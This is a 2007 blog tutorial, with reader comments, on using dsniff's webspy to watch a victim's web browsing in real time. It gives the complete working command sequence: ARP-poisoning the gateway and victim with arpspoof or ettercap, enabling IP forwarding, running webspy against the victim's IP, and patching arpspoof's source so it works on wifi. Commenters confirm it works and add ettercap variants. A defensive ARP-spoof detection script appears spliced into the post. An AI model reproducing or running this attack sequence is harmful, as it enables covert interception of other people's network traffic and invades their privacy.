Thursday, June 14, 2007

How to use Webspy from the dsniff suite

Webspy is an interesting tool from the dsniff family, which also includes dsniff (password sniffer), arpspoof (ARP poisoning tool), dnsspoof (DNS spoofing tool), msgsnarf (view messages from IM clients), mailsnarf (view email messages), tcpkill (kill TCP connections on a local LAN), tcpnice (force other hosts' TCP connections to "play nice") and webspy (view a target's web browsing in real time). When properly set up it intercepts web browsing requests from the victim and displays them in the attacker's web browser in real time. This post will show you how to run webspy successfully. I am assuming a basic knowledge of the Unix command shell, and that you have read the entire man pages for all of the applications listed in this write-up.

You will need the following tools to successfully use webspy (tested using Ubuntu 7.04 and Slackware 11):

An ARP spoofing application; either arpspoof or ettercap will do.

fragrouter, or echo 1 > /proc/sys/net/ipv4/ip_forward

webspy

A web browser (Firefox 2.0.0.4 was used)

The first step is to ARP poison both the target and the gateway for the local subnet. This can be accomplished with one of two tools: the venerable arpspoof, or the more recent ettercap (which has its own plugin for remote browsing, but that is outside the scope of this example). I will show both for completeness.

# arpspoof -i interface -t gatewayIP victimIP

# arpspoof -i interface -t victimIP gatewayIP

Open these in two separate shells and run them independently of one another. If you receive "arpspoof: couldn't arp for host 10.1.1.1" or a similar error, please see the Troubleshooting section at the end of this document.

To accomplish the same effect using ettercap as your ARP poisoner of choice:

# ettercap -i interface -Tq -M arp:remote /gatewayIP/ /victimIP/

At this stage you will need to open another shell and ensure that you are forwarding the intercepted packets back onto the network, so that the victim's traffic still reaches its destination. As is normal for most things, there is more than one way to accomplish this goal.

# fragrouter -B1

If you do not have fragrouter, or for some reason wish to pursue an alternate method of achieving the same goal, you can enable kernel IP forwarding from the command line instead:

# echo 1 > /proc/sys/net/ipv4/ip_forward

You will need to open another shell/console to execute webspy:

# webspy -i interface victimIP

Well we are almost there! You will need to start one more shell and start up your browser from the command line (starting the browser via other methods did not function correctly for me).

# mozilla &

At this point, if you have followed the directions correctly, your browser will start and any sites visited by the victimIP will appear in your browser in real time.
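From the defender's side, the two arpspoof shells above leave a distinctive trace on the LAN: a single MAC address suddenly answering for both the gateway and the victim. The following is an added example (not part of the original post, and not dsniff code) that checks a constructed stream of ARP reply records against a known-good IP-to-MAC table and flags both symptoms; the IPs, MACs and timestamps are assumed.

```python
# Added example: detect the ARP-poisoning pattern used in the tutorial above.
# Input is constructed ARP reply records (timestamp, sender_ip, sender_mac);
# on a real host you would feed it from `ip neigh`, arpwatch, or a pcap.
from collections import defaultdict

# Constructed baseline: what the LAN looked like before the attack.
KNOWN_GOOD = {
    "10.1.1.1": "00:11:22:33:44:01",   # gateway
    "10.1.1.50": "00:11:22:33:44:50",  # victim
    "10.1.1.60": "00:11:22:33:44:60",  # attacker host (legitimately owns this IP)
}

# Constructed ARP replies: host 44:60 starts answering for gateway and victim.
ARP_REPLIES = [
    ("10:00:01", "10.1.1.1",  "00:11:22:33:44:01"),
    ("10:00:02", "10.1.1.50", "00:11:22:33:44:50"),
    ("10:00:05", "10.1.1.1",  "00:11:22:33:44:60"),  # gateway IP now from 44:60
    ("10:00:05", "10.1.1.50", "00:11:22:33:44:60"),  # victim IP now from 44:60
    ("10:00:07", "10.1.1.1",  "00:11:22:33:44:60"),  # arpspoof re-sends every ~2s
]

def detect_arp_spoof(replies, known_good, gateway_ip):
    """Return a list of alert strings. Two checks:
    1. an IP's MAC differs from the known-good binding (per-reply check);
    2. one MAC answers for more than one IP, which is exactly the two-shell
       arpspoof setup: the attacker's MAC stands in for both ends."""
    alerts = []
    claims = defaultdict(set)  # mac -> set of IPs it has answered for
    for ts, ip, mac in replies:
        claims[mac].add(ip)
        expected = known_good.get(ip)
        if expected is not None and mac != expected:
            alerts.append(f"{ts} {ip} answered by {mac}, expected {expected}")
    for mac, ips in claims.items():
        if len(ips) > 1:
            tag = " (includes gateway)" if gateway_ip in ips else ""
            alerts.append(f"{mac} claims {len(ips)} IPs{tag}: {', '.join(sorted(ips))}")
    return alerts

def main():
    for line in detect_arp_spoof(ARP_REPLIES, KNOWN_GOOD, "10.1.1.1"):
        print("ALERT:", line)

if __name__ == "__main__":
    main()
```

The per-reply check is what arpwatch-style tools do; the multi-IP check catches the poisoning even if the known-good table is incomplete, and static ARP entries for the gateway on critical hosts are the usual mitigation.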

Troubleshooting:

Q:

Every time I attempt to execute arpspoof I get the following error: arpspoof: couldn't arp for host 10.1.1.1. I have tried various command line switches and nothing appears to work.

A:

I received this error on my Slackware 11 installation, where dsniff was compiled from source rather than installed with a package manager. The function arp_cache_lookup does not use the interface given on the command line when running under Linux; it always uses the interface "eth0". Don't fret, we can change this without too much effort. Change directory to where you unpacked dsniff, find the file arp.c and edit a single parameter within it. Using your favorite editor, open arp.c and change the following:

strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev));

to

strncpy(ar.arp_dev, "wlan0", sizeof(ar.arp_dev));

Save the file and recompile the application. (Substitute the name of the interface you actually use if it is not wlan0.)

If you have other issues, you got it running properly or you just want to drop a line feel free to leave a comment.

May Your Skill Prevail.

6 comments:

gunce said...

Another way for troubleshooting is to use the -i option to specify the interface.

olegunner said...

Awesome to the max! Worked for me, but kinda scary though!

Anthony Williams said...

*gunce

In my experience using the -i switch does not work with modern wifi interfaces. Hence the source code edit and recompile.

*olegunner, glad that it worked out for you! It can be a bit intimidating at first but those who persevere get the rewards.

Pierre-Yves said...

Thx for the tutorial.

Using ettercap, you shouldn't enable IP forwarding, because it disables it (read the man).

sudo ettercap -i eth1 -Tq -M arp:remote /192.168.1.1/ //

=> you need ettercap to find at least 2 hosts (else, retry).

Using webspy: I have one little problem: webspy relies on server IPs, not on server names. That can be a problem on servers with multiple sites.

The URL mysite.com/mypage will become 64.293.38.2/mypage, and you may get a server error saying "you didn't provide the servername".

I think webspy should look into the packets to find the server name... Do you know another tool that would do that ?

DGeezer said...

Does anyone know if this method can be used with Backtrack 3 and Firefox v.2.0.0.11, and how it might be set up? I used the above methods, but when I issued the 'mozilla &' command, nothing happened! Also, thanks in advance :-)

sudo becomes root said...

Hi
Thank you for your detailed tutorial and it worked!
But strangely, when a sniffed URL opened up in my Firefox, I also got another web page opening up saying "I am alive!" in text. I have no idea where it came from or why it came up; have you encountered this problem before?

Cheers,
Harry